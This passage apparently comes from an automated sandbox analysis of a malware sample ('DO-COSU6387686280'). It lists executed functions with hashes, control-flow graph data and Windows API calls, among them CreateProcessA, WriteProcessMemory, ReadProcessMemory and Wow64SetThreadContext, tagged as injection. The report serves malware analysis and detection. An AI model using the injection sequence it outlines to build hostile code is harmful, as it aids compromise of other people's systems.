DuplicateHandle 26740 13ed686 26739->26740 26782 13ecfa0 26783 13ecfe6 GetCurrentProcess 26782->26783 26785 13ed038 GetCurrentThread 26783->26785 26786 13ed031 26783->26786 26787 13ed06e 26785->26787 26788 13ed075 GetCurrentProcess 26785->26788 26786->26785 26787->26788 26791 13ed0ab 26788->26791 26789 13ed0d3 GetCurrentThreadId 26790 13ed104 26789->26790 26791->26789 26951 13eac10 26952 13eac1f 26951->26952 26955 13ead08 26951->26955 26960 13eacf8 26951->26960 26956 13ead3c 26955->26956 26957 13ead19 26955->26957 26956->26952 26957->26956 26958 13eaf40 GetModuleHandleW 26957->26958 26959 13eaf6d 26958->26959 26959->26952 26961 13ead3c 26960->26961 26962 13ead19 26960->26962 26961->26952 26962->26961 26963 13eaf40 GetModuleHandleW 26962->26963 26964 13eaf6d 26963->26964 26964->26952

                                                                                        Executed Functions

                                                                                        Function 05E76213 Relevance: .2, Instructions: 167COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd062afa3d9344f1902b3d98c0f1b5ebbaa84c33a62187018ccef5dfc9bdb403
                                                                                        • Instruction ID: cfb4fa8f09968c0b7e0fdf6eca35eb4f1aeaf6a31c332d5957e6aec66d4ecd30
                                                                                        • Opcode Fuzzy Hash: cd062afa3d9344f1902b3d98c0f1b5ebbaa84c33a62187018ccef5dfc9bdb403
                                                                                        • Instruction Fuzzy Hash: CD81B374D04628CFDB14CFA5C984BEDBBF6BF49305F14A0A9E549AB255DB309981CF10
                                                                                        Function 05E76161 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f17eafd2e355129bca41a263151f3c0111a2caba88e81e104b88c5ec2e49ddc9
                                                                                        • Instruction ID: 7fcbea65304bcfe231abe0012a4be14dca767ee5d1b44c06cc60ac23a74398aa
                                                                                        • Opcode Fuzzy Hash: f17eafd2e355129bca41a263151f3c0111a2caba88e81e104b88c5ec2e49ddc9
                                                                                        • Instruction Fuzzy Hash: CE21C7B1D046189BEB18CFABC9457DEFAF7AFC8314F14D06AD408B6254EB7409468F90
                                                                                        Function 05E76170 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 32ef00db5c3220a164c173836b8b9481439ef2c9a706407a11ce7bbe4d75c68d
                                                                                        • Instruction ID: e07115ea46837073419323904bbd99a766fcc2372b4238c51395869254a0fbe2
                                                                                        • Opcode Fuzzy Hash: 32ef00db5c3220a164c173836b8b9481439ef2c9a706407a11ce7bbe4d75c68d
                                                                                        • Instruction Fuzzy Hash: 6221B3B1D046189BEB18CFABC9497DEFAF7AFC9304F14D06AD40976264EB7409458F90
                                                                                        Function 013ECF90 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 013ED01E
                                                                                        • GetCurrentThread.KERNEL32 ref: 013ED05B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 013ED098
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 013ED0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: fb1dd99ba2c0e8d03f2aa3b89dba0127a2eeecfa78c0c1a0ee8995ab04851e33
                                                                                        • Instruction ID: 89e71d691595801c9788e59698fd9682decf4b19b6d4cf9eb765f755f6d48b46
                                                                                        • Opcode Fuzzy Hash: fb1dd99ba2c0e8d03f2aa3b89dba0127a2eeecfa78c0c1a0ee8995ab04851e33
                                                                                        • Instruction Fuzzy Hash: E65175B09007099FEB14CFAAD588BDEBFF1AF88314F248459E419A7390D7349D85CB66
                                                                                        Function 013ECFA0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 013ED01E
                                                                                        • GetCurrentThread.KERNEL32 ref: 013ED05B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 013ED098
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 013ED0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 75a45ef80af647d09c9fc1eb1923926676acef433c5a8c78132a9173e715abd1
                                                                                        • Instruction ID: 21f897f257122525fae01ac2117794ca713c1c888cb2805dff35688bfd827d33
                                                                                        • Opcode Fuzzy Hash: 75a45ef80af647d09c9fc1eb1923926676acef433c5a8c78132a9173e715abd1
                                                                                        • Instruction Fuzzy Hash: 195165B09007099FEB14CFAAD588BDEBBF1BF88314F248459E419A7390D7349D85CB66
                                                                                        Function 05E7BDD4 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 45 5e7bdd4-5e7be75 47 5e7be77-5e7be81 45->47 48 5e7beae-5e7bece 45->48 47->48 49 5e7be83-5e7be85 47->49 53 5e7bf07-5e7bf36 48->53 54 5e7bed0-5e7beda 48->54 50 5e7be87-5e7be91 49->50 51 5e7bea8-5e7beab 49->51 55 5e7be95-5e7bea4 50->55 56 5e7be93 50->56 51->48 64 5e7bf6f-5e7c029 CreateProcessA 53->64 65 5e7bf38-5e7bf42 53->65 54->53 57 5e7bedc-5e7bede 54->57 55->55 58 5e7bea6 55->58 56->55 59 5e7bf01-5e7bf04 57->59 60 5e7bee0-5e7beea 57->60 58->51 59->53 62 5e7beee-5e7befd 60->62 63 5e7beec 60->63 62->62 66 5e7beff 62->66 63->62 76 5e7c032-5e7c0b8 64->76 77 5e7c02b-5e7c031 64->77 65->64 67 5e7bf44-5e7bf46 65->67 66->59 69 5e7bf69-5e7bf6c 67->69 70 5e7bf48-5e7bf52 67->70 69->64 71 5e7bf56-5e7bf65 70->71 72 5e7bf54 70->72 71->71 74 5e7bf67 71->74 72->71 74->69 87 5e7c0ba-5e7c0be 76->87 88 5e7c0c8-5e7c0cc 76->88 77->76 87->88 89 5e7c0c0 87->89 90 5e7c0ce-5e7c0d2 88->90 91 5e7c0dc-5e7c0e0 88->91 89->88 90->91 92 5e7c0d4 90->92 93 5e7c0e2-5e7c0e6 91->93 94 5e7c0f0-5e7c0f4 91->94 92->91 93->94 95 5e7c0e8 93->95 96 5e7c106-5e7c10d 94->96 97 5e7c0f6-5e7c0fc 94->97 95->94 98 5e7c124 96->98 99 5e7c10f-5e7c11e 96->99 97->96 101 5e7c125 98->101 99->98 101->101
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E7C016
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 3547457400eadf9a84bff915556e143584677a47f7d850fbca78018584577a6e
                                                                                        • Instruction ID: a347bd43e88e4ceb200caf2783c8b8417e496bde251c3e6bee74ba0135dfc1c4
                                                                                        • Opcode Fuzzy Hash: 3547457400eadf9a84bff915556e143584677a47f7d850fbca78018584577a6e
                                                                                        • Instruction Fuzzy Hash: F3A16A71D0031D9FEB24CF68C841BEEBBB6BF48314F1481A9E859A7280DB759985CF91
                                                                                        Function 05E7BDE0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 102 5e7bde0-5e7be75 104 5e7be77-5e7be81 102->104 105 5e7beae-5e7bece 102->105 104->105 106 5e7be83-5e7be85 104->106 110 5e7bf07-5e7bf36 105->110 111 5e7bed0-5e7beda 105->111 107 5e7be87-5e7be91 106->107 108 5e7bea8-5e7beab 106->108 112 5e7be95-5e7bea4 107->112 113 5e7be93 107->113 108->105 121 5e7bf6f-5e7c029 CreateProcessA 110->121 122 5e7bf38-5e7bf42 110->122 111->110 114 5e7bedc-5e7bede 111->114 112->112 115 5e7bea6 112->115 113->112 116 5e7bf01-5e7bf04 114->116 117 5e7bee0-5e7beea 114->117 115->108 116->110 119 5e7beee-5e7befd 117->119 120 5e7beec 117->120 119->119 123 5e7beff 119->123 120->119 133 5e7c032-5e7c0b8 121->133 134 5e7c02b-5e7c031 121->134 122->121 124 5e7bf44-5e7bf46 122->124 123->116 126 5e7bf69-5e7bf6c 124->126 127 5e7bf48-5e7bf52 124->127 126->121 128 5e7bf56-5e7bf65 127->128 129 5e7bf54 127->129 128->128 131 5e7bf67 128->131 129->128 131->126 144 5e7c0ba-5e7c0be 133->144 145 5e7c0c8-5e7c0cc 133->145 134->133 144->145 146 5e7c0c0 144->146 147 5e7c0ce-5e7c0d2 145->147 148 5e7c0dc-5e7c0e0 145->148 146->145 147->148 149 5e7c0d4 147->149 150 5e7c0e2-5e7c0e6 148->150 151 5e7c0f0-5e7c0f4 148->151 149->148 150->151 152 5e7c0e8 150->152 153 5e7c106-5e7c10d 151->153 154 5e7c0f6-5e7c0fc 151->154 152->151 155 5e7c124 153->155 156 5e7c10f-5e7c11e 153->156 154->153 158 5e7c125 155->158 156->155 158->158
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E7C016
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 3952c3d8eddbc1462c95623b058d235cc281e0223a596a3f9a99f197d642f5ce
                                                                                        • Instruction ID: e729043992a61970a7519e0f4a2a509100243176007e8ea6d0e5d6607485678a
                                                                                        • Opcode Fuzzy Hash: 3952c3d8eddbc1462c95623b058d235cc281e0223a596a3f9a99f197d642f5ce
                                                                                        • Instruction Fuzzy Hash: 49915871D0031D9FEB24CFA8C841BEEBBB6BF48314F1481A9E859A7240DB759985CF91
                                                                                        Function 013EAD08 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 159 13ead08-13ead17 160 13ead19-13ead26 call 13ea02c 159->160 161 13ead43-13ead47 159->161 167 13ead3c 160->167 168 13ead28 160->168 163 13ead5b-13ead9c 161->163 164 13ead49-13ead53 161->164 170 13ead9e-13eada6 163->170 171 13eada9-13eadb7 163->171 164->163 167->161 217 13ead2e call 13eafa0 168->217 218 13ead2e call 13eaf90 168->218 170->171 172 13eaddb-13eaddd 171->172 173 13eadb9-13eadbe 171->173 178 13eade0-13eade7 172->178 175 13eadc9 173->175 176 13eadc0-13eadc7 call 13ea038 173->176 174 13ead34-13ead36 174->167 177 13eae78-13eaf38 174->177 180 13eadcb-13eadd9 175->180 176->180 210 13eaf3a-13eaf3d 177->210 211 13eaf40-13eaf6b GetModuleHandleW 177->211 181 13eade9-13eadf1 178->181 182 13eadf4-13eadfb 178->182 180->178 181->182 185 13eadfd-13eae05 182->185 186 13eae08-13eae11 call 13ea048 182->186 185->186 190 13eae1e-13eae23 186->190 191 13eae13-13eae1b 186->191 192 13eae25-13eae2c 190->192 193 13eae41-13eae45 190->193 191->190 192->193 195 13eae2e-13eae3e call 13ea058 call 13ea068 192->195 215 13eae48 call 13eb270 193->215 216 13eae48 call 13eb2a0 193->216 195->193 198 13eae4b-13eae4e 200 13eae50-13eae6e 198->200 201 13eae71-13eae77 198->201 200->201 210->211 212 13eaf6d-13eaf73 211->212 213 13eaf74-13eaf88 211->213 212->213 215->198 216->198 217->174 218->174
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 013EAF5E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: affb9a62176070279d77953374822b1bd2b08ab9a06098cf74decc9ab31445e9
                                                                                        • Instruction ID: 1013df14862f9c6c3f50296160afc1a3e66549d063d99e8ec96494358aebc211
                                                                                        • Opcode Fuzzy Hash: affb9a62176070279d77953374822b1bd2b08ab9a06098cf74decc9ab31445e9
                                                                                        • Instruction Fuzzy Hash: 48714470A00B158FEB24DF29D45875ABBF5FF88308F108A2DD04AD7A90D775E849CB90
                                                                                        Function 013E58EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 219 13e58ec-13e59b9 CreateActCtxA 221 13e59bb-13e59c1 219->221 222 13e59c2-13e5a1c 219->222 221->222 229 13e5a1e-13e5a21 222->229 230 13e5a2b-13e5a2f 222->230 229->230 231 13e5a40 230->231 232 13e5a31-13e5a3d 230->232 234 13e5a41 231->234 232->231 234->234
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013E59A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 6b5f48c30b1e9e05e5ebdfed241f64e16374b53ac52b7777e8a4bf94c13514df
                                                                                        • Instruction ID: d63b9c8b556751061c128d115e5c12e7e2a65dcb4eaa6f9721c84244e1b1c5ee
                                                                                        • Opcode Fuzzy Hash: 6b5f48c30b1e9e05e5ebdfed241f64e16374b53ac52b7777e8a4bf94c13514df
                                                                                        • Instruction Fuzzy Hash: D241E3B4C00719CBEB25CFAAC884BCEBBF5BF45708F20805AD408AB291DB715946CF91
                                                                                        Function 013E44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 235 13e44b0-13e59b9 CreateActCtxA 238 13e59bb-13e59c1 235->238 239 13e59c2-13e5a1c 235->239 238->239 246 13e5a1e-13e5a21 239->246 247 13e5a2b-13e5a2f 239->247 246->247 248 13e5a40 247->248 249 13e5a31-13e5a3d 247->249 251 13e5a41 248->251 249->248 251->251
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013E59A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 5157b24d67d4616ca8621c0bd2f8c6dc574418d054947ea4e57d4e8c63e08108
                                                                                        • Instruction ID: d6e73e546d702f93d804d8453a1c8aa0e1cbf1afe4a59f5f8eec8ce03f3f0c7f
                                                                                        • Opcode Fuzzy Hash: 5157b24d67d4616ca8621c0bd2f8c6dc574418d054947ea4e57d4e8c63e08108
                                                                                        • Instruction Fuzzy Hash: 5441B2B4C00719CBEB24DFAAC8447DEBBF5BF49708F10806AD409AB251DB755945CF90
                                                                                        Function 05E7B719 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 252 5e7b719-5e7b76e 254 5e7b770-5e7b77c 252->254 255 5e7b77e-5e7b7bd WriteProcessMemory 252->255 254->255 257 5e7b7c6-5e7b7f6 255->257 258 5e7b7bf-5e7b7c5 255->258 258->257
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05E7B7B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: a8137f05c739bdd89fecf61dfee0b14389659d28e5ae46d7f08e3cd448b45ccf
                                                                                        • Instruction ID: 2b9e8c4ee4663a5c885c7c318bb63e0a8b2f5540220d8c0a63a14b19c12b0f9d
                                                                                        • Opcode Fuzzy Hash: a8137f05c739bdd89fecf61dfee0b14389659d28e5ae46d7f08e3cd448b45ccf
                                                                                        • Instruction Fuzzy Hash: DE2146769003499FDB10CFA9C881BDEBBF5FF48310F10882AE959A7240D7789954DFA4
                                                                                        Function 05E7B720 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 262 5e7b720-5e7b76e 264 5e7b770-5e7b77c 262->264 265 5e7b77e-5e7b7bd WriteProcessMemory 262->265 264->265 267 5e7b7c6-5e7b7f6 265->267 268 5e7b7bf-5e7b7c5 265->268 268->267
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05E7B7B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 5919862fd2af456075907edde1bb7153f941f8ea282d82d2a2e368bb26636a5e
                                                                                        • Instruction ID: caf1be6c0b819b3509a2f683b3f6adc6e7d8094535797d58dc199198c183cfa9
                                                                                        • Opcode Fuzzy Hash: 5919862fd2af456075907edde1bb7153f941f8ea282d82d2a2e368bb26636a5e
                                                                                        • Instruction Fuzzy Hash: BB2125769003499FDB10CFAAC881BDEBBF9FF48310F10842AE959A7240D7789940CFA4
                                                                                        Function 05E7B148 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 272 5e7b148-5e7b19b 274 5e7b19d-5e7b1a9 272->274 275 5e7b1ab-5e7b1db Wow64SetThreadContext 272->275 274->275 277 5e7b1e4-5e7b214 275->277 278 5e7b1dd-5e7b1e3 275->278 278->277
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05E7B1CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 800e7ee8596dde082a08cad1e14640f0a0b285230177b1c9842a6ba518705984
                                                                                        • Instruction ID: 04c222d2122a9240f2aff49b086fe5e76fa25ee990e82d984da6c4c41e0c54f5
                                                                                        • Opcode Fuzzy Hash: 800e7ee8596dde082a08cad1e14640f0a0b285230177b1c9842a6ba518705984
                                                                                        • Instruction Fuzzy Hash: 09213871D003098FEB14CFAAC485BEEBBF5BF88314F14842AE459A7240D7789945CFA5
                                                                                        Function 05E7BC40 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 282 5e7bc40-5e7bcd5 ReadProcessMemory 285 5e7bcd7-5e7bcdd 282->285 286 5e7bcde-5e7bd0e 282->286 285->286
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E7BCC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: a7cff58b2f6bb9570aef2f2179288b09f8a4aa9350fa8800be4c30c43734be4a
                                                                                        • Instruction ID: 5af2eab0a0bc659811c850d332e297148bd89251433aa4cb001ad9f699342f50
                                                                                        • Opcode Fuzzy Hash: a7cff58b2f6bb9570aef2f2179288b09f8a4aa9350fa8800be4c30c43734be4a
                                                                                        • Instruction Fuzzy Hash: CC2136B190034A9FDB10CFAAC880BEEBBF5FF48310F14882AE559A7240C7789505DBA0
                                                                                        Function 013ED5E9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 290 13ed5e9-13ed5ee 291 13ed5f0-13ed684 DuplicateHandle 290->291 292 13ed68d-13ed6aa 291->292 293 13ed686-13ed68c 291->293 293->292
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED677
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 5e5d3d6b18c3e81f5fa3b3d20dfd4535861db8206a2d6e6a06439490a5969764
                                                                                        • Instruction ID: a45d655e8748370b1ea7a79af7601c35b9e8876ab19a1fe3dcd26dfbaeda1316
                                                                                        • Opcode Fuzzy Hash: 5e5d3d6b18c3e81f5fa3b3d20dfd4535861db8206a2d6e6a06439490a5969764
                                                                                        • Instruction Fuzzy Hash: 0B21E3B59003199FDB10CFAAD884ADEBBF8EB48324F14841AE918A7350D374A944CFA5
                                                                                        Function 05E7B150 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 296 5e7b150-5e7b19b 298 5e7b19d-5e7b1a9 296->298 299 5e7b1ab-5e7b1db Wow64SetThreadContext 296->299 298->299 301 5e7b1e4-5e7b214 299->301 302 5e7b1dd-5e7b1e3 299->302 302->301
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05E7B1CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: a9fd41379720eb671bdef6b2368afacf7b4911a85dca72512b0af462ca3f84e0
                                                                                        • Instruction ID: 91a03640075b283bc84e77cee6952558fb0e267451a72fdca1d5b3966a1a3499
                                                                                        • Opcode Fuzzy Hash: a9fd41379720eb671bdef6b2368afacf7b4911a85dca72512b0af462ca3f84e0
                                                                                        • Instruction Fuzzy Hash: 0E212971D043098FEB14DFAAC4857EEBBF4EF48314F14842AD459A7240D7789945CFA5
                                                                                        Function 05E7BC48 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 306 5e7bc48-5e7bcd5 ReadProcessMemory 309 5e7bcd7-5e7bcdd 306->309 310 5e7bcde-5e7bd0e 306->310 309->310
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E7BCC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 7502661551b9b58e14a591627ad77c9d8493987473ae0557e3f4a83eead972b1
                                                                                        • Instruction ID: 738e3abfbbf93187788dbdf538312dc024b2af823aa4301937510feb2c4447d0
                                                                                        • Opcode Fuzzy Hash: 7502661551b9b58e14a591627ad77c9d8493987473ae0557e3f4a83eead972b1
                                                                                        • Instruction Fuzzy Hash: 952128B18003499FDB10CFAAC881BEEBBF5FF48310F14842AE519A7240D7789500DBA5
                                                                                        Function 013ED5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 314 13ed5f0-13ed684 DuplicateHandle 315 13ed68d-13ed6aa 314->315 316 13ed686-13ed68c 314->316 316->315
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED677
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 7cd6fd248cd233693fa5f73b19f0e2fc5637465e69c510b3d943a8065e104e22
                                                                                        • Instruction ID: 5fb8d37147422a23385e9460ef1a1aa87ae69c512e4f0089c4c886c184cec29e
                                                                                        • Opcode Fuzzy Hash: 7cd6fd248cd233693fa5f73b19f0e2fc5637465e69c510b3d943a8065e104e22
